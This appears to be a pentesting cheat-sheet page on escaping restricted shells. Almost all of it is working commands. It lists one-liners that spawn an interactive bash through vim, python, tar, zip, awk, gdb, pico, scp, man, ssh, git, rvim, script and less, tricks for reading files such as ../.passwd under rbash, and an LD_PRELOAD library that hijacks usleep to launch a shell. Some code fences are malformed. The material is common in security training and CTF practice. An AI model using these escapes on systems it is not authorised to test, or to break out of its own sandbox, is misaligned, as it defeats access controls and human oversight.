Skip to content

Escaping restricted shells

```bash tab="vim" vim --cmd "set shell=/bin/bash" --cmd "shell"

```python tab="python"
python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import os; os.system("/bin/bash")'

```bash tab="tar" tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash

```bash tab="zip"
zip $(mktemp -u) /etc/hosts -T --unzip-command="bash #"

zip $(mktemp -u) /etc/hosts -T -TT "bash #"

### note: -TT is a shortened version of --unzip-command

```bash tab="awk" awk 'BEGIN {system("/bin/bash")}'

```bash tab="gdb"
gdb -q -nx -ex '!bash' -ex quit

```bash tab="pico" pico -s "/bin/bash"

type /bin/bash and then press CTRL + T

TF=$(mktemp); echo 'exec bash'>$TF; chmod 777 $TF; pico -s $TF /etc/hosts

immediately CTRL + T

```bash tab="scp"
TF=$(mktemp); echo 'bash 0<&2 1>&2' > $TF; chmod 777 "$TF"; scp -S $TF x y:

### or if script.sh exists (bash 0<&2 1>&2)
scp -S script.sh x y:

``` tab="man" man man

then type !/bin/bash and then press enter

TF=$(mktemp); echo '/bin/bash >&2 0>&2'>$TF; chmod 777 $TF; man --pager=/bin/bash $TF

echo "bash 0<&2 1>&2" > script.sh

man --pager=/bin/bash script.sh

```bash tab="ssh"
TF=$(mktemp); echo 'bash 0<&2 1>&2' > $TF; chmod 777 $TF; ssh -o ProxyCommand=$TF 127.0.0.1

### echo "bash 0<&2 1>&2" > script.sh
ssh -o ProxyCommand=script.sh 127.0.0.1

```bash tab="git" git help status

then type !/bin/bash and then press enter

TF=$(mktemp); echo 'bash 0<&2 1>&2' > $TF; chmod 777 $TF; git -c core.pager=$TF --paginate help

echo "bash 0<&2 1>&2" > script.sh

git -c core.pager=script.sh --paginate help

```bash tab="rvim"
rvim
## then type :python import os; os.system("/bin/bash") and then press enter

TF=$(mktemp); echo "import os;os.system('bash')" > $TF; chmod 777 $TF; rvim -c "pyfile $TF"

### echo "import os;os.system('bash')" > script.py
rvim -c "pyfile script.py"

```bash tab="script" script -c /bin/bash /dev/null

```bash tab="mapfile (Read Files)"
### Useful if rbash is restricting cd and "/" in command names
mapfile -t < /PATH/TO/FILE; printf "%s\n" "${MAPFILE[@]}"
mapfile foo < /PATH/TO/FILE; printf "%s" "${foo[@]}"

## reference: https://www.computerhope.com/unix/bash/mapfile.htm

```bash tab="process substitution"

read files

echo $(<../.passwd)

```bash tab="LD_PRELOAD"
## create a script that overwrites a C function
## This example uses usleep (identified from objdump on the target binary)


## script.c

#include <stdio.h>
#include <stdlib.h>
void usleep() {
unsetenv("LD_PRELOAD");
system("echo ok! && /bin/bash");
exit(0);
}

chmod 777 script.c
gcc -shared script.c -o script
chmod 777 script

declare -x LD_PRELOAD=/PATH/TO/script

```bash tab="less"

from less --help:

!command Execute the shell command with $SHELL. |Xcommand Pipe file between current pos & mark X to shell command.

1) simply type in: !/bin/bash

2) type ma |aCOMMAND

|a will change to "!" as you type

```